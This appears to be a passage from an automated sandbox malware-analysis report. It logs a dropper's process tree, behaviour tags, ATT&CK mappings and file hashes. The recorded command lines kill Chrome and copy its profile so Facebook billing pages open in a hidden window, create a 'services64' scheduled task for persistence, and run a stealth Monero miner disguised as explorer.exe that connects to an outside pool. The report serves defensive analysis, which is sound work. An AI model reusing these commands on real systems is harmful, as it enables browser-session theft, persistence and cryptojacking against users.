C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:19⤵PID:436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:89⤵PID:5340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:89⤵
- Suspicious behavior: EnumeratesProcesses
PID:5356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:19⤵PID:5448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:19⤵PID:5456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:19⤵PID:5616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:19⤵PID:5624
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 9aa6e16872.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe9aa6e16872.exe5⤵
- Executes dropped EXE
- Drops Chrome extension
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4336 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
- System Location Discovery: System Language Discovery
PID:5020 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y6⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/6⤵
- Drops file in Program Files directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5020 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4f43cc40,0x7ffc4f43cc4c,0x7ffc4f43cc587⤵
- Suspicious behavior: EnumeratesProcesses
PID:4408 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4408 -s 7408⤵PID:1848
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:27⤵PID:2728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2188,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1776 /prefetch:37⤵PID:3680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2288,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2496 /prefetch:87⤵PID:3228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:17⤵PID:4476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:17⤵PID:4424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3424,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:17⤵PID:1052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3548,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3788 /prefetch:17⤵PID:1908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3860,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:17⤵PID:3748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3972,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:17⤵PID:328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5036,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:17⤵
- Drops file in Program Files directory
PID:540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3984,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3496 /prefetch:27⤵
- Drops file in Program Files directory
PID:1088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3432 /prefetch:27⤵
- Drops file in Program Files directory
PID:4984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4156,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:27⤵PID:2628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4652,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:27⤵PID:5096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3476,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3528 /prefetch:27⤵PID:4956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=4132,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3960 /prefetch:27⤵PID:4744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=3236,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4268 /prefetch:27⤵PID:1076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=4200,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3252 /prefetch:27⤵PID:3044
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 1710990cbc64.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe1710990cbc64.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4344 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe" -a6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2276
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe53516815d3135fe3.exe5⤵
- Executes dropped EXE
PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c c862a054a35.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exec862a054a35.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe4f5baa1083db067.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exef34b9ab9db6d16.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exee4b2f18fb52218.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 453c5fa76a849.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe453c5fa76a849.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
PID:2936 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 3566⤵
- Program crash
PID:4616
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 08240101651be7e010.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe08240101651be7e010.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2708 -
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2968 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵PID:3440
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Scheduled Task/Job: Scheduled Task
PID:3164
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2828 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:5948
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Scheduled Task/Job: Scheduled Task
PID:6108
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
- Executes dropped EXE
PID:6020
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵
- Suspicious behavior: EnumeratesProcesses
PID:5188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2488 -
C:\Windows\winnetdriv.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527219 07⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1516
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 5644⤵
- Program crash
PID:1492
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 396 -ip 3961⤵PID:3792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2936 -ip 29361⤵PID:5012
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3652
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1848
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3076
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
20KB
MD554ad0d820f5eedc3ccb93a548fca33fc
SHA1378ab33d0a1fa2ec748c893d68c279a2073dd2d7
SHA25628e8d4844e25f157663e4e4a95e038dd0a5f27bc14f41ac40e74bb184401936b
SHA5126d23c8f73645bb2c6860dda462dafe443ab98b32e11be3ea808c92ec84fa706da36dc19c595145d76528ed314a4119caaa3e085438ec0ffe7a9cced4f8b36ddc
-
Filesize
114KB
MD5013b18b14247306181ec7ae01d24aa15
SHA15ce4cb396bf23585fbcae7a9733fe0f448646313
SHA256edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44
SHA5122035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94
-
Filesize
275B
MD5a378c450e6ad9f1e0356ed46da190990
SHA1d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\background.html
Filesize786B
MD59ffe618d587a0685d80e9f8bb7d89d39
SHA18e9cae42c911027aafae56f9b1a16eb8dd7a739c
SHA256a1064146f622fe68b94cd65a0e8f273b583449fbacfd6fd75fec1eaaf2ec8d6e
SHA512a4e1f53d1e3bf0ff6893f188a510c6b3da37b99b52ddd560d4c90226cb14de6c9e311ee0a93192b1a26db2d76382eb2350dc30ab9db7cbd9ca0a80a507ea1a12
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\icon.png
Filesize6KB
MD5c8d8c174df68910527edabe6b5278f06
SHA18ac53b3605fea693b59027b9b471202d150f266f
SHA2569434dd7008059a60d6d5ced8c8a63ab5cae407e7152da98ca4dda408510f08f5
SHA512d439e5124399d1901934319535b7156c0ca8d76b5aa4ddf1dd0b598d43582f6d23c16f96be74d3cd5fe764396da55ca51811d08695f356f12f7a8a71bcc7e45c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\aes.js
Filesize13KB
MD54ff108e4584780dce15d610c142c3e62
SHA177e4519962e2f6a9fc93342137dbb31c33b76b04
SHA256fc7e184beeda61bf6427938a84560f52348976bb55e807b224eb53930e97ef6a
SHA512d6eee0fc02205a3422c16ad120cad8d871563d8fcd4bde924654eac5a37026726328f9a47240cf89ed6c9e93ba5f89c833e84e65eee7db2b4d7d1b4240deaef2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\content.js
Filesize14KB
MD5dd274022b4205b0da19d427b9ac176bf
SHA191ee7c40b55a1525438c2b1abe166d3cb862e5cb
SHA25641e129bb90c2ac61da7dac92a908559448c6448ba698a450b6e7add9493739c6
SHA5128ee074da689a7d90eca3c8242f7d16b0390b8c9b133d7bbdef77f8bf7f9a912e2d60b4a16f1c934f1bd38b380d6536c23b3a2f9939e31a8ef9f9c539573387b4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\jquery-3.3.1.min.js
Filesize84KB
MD5a09e13ee94d51c524b7e2a728c7d4039
SHA10dc32db4aa9c5f03f3b38c47d883dbd4fed13aae
SHA256160a426ff2894252cd7cebbdd6d6b7da8fcd319c65b70468f10b6690c45d02ef
SHA512f8da8f95b6ed33542a88af19028e18ae3d9ce25350a06bfc3fbf433ed2b38fefa5e639cddfdac703fc6caa7f3313d974b92a3168276b3a016ceb28f27db0714a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\mode-ecb.js
Filesize604B
MD523231681d1c6f85fa32e725d6d63b19b
SHA1f69315530b49ac743b0e012652a3a5efaed94f17
SHA25603164b1ac43853fecdbf988ce900016fb174cf65b03e41c0a9a7bf3a95e8c26a
SHA51236860113871707a08401f29ab2828545932e57a4ae99e727d8ca2a9f85518d3db3a4e5e4d46ac2b6ba09494fa9727c033d77c36c4bdc376ae048541222724bc2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\pad-nopadding.js
Filesize268B
MD50f26002ee3b4b4440e5949a969ea7503
SHA131fc518828fe4894e8077ec5686dce7b1ed281d7
SHA256282308ebc3702c44129438f8299839ca4d392a0a09fdf0737f08ef1e4aff937d
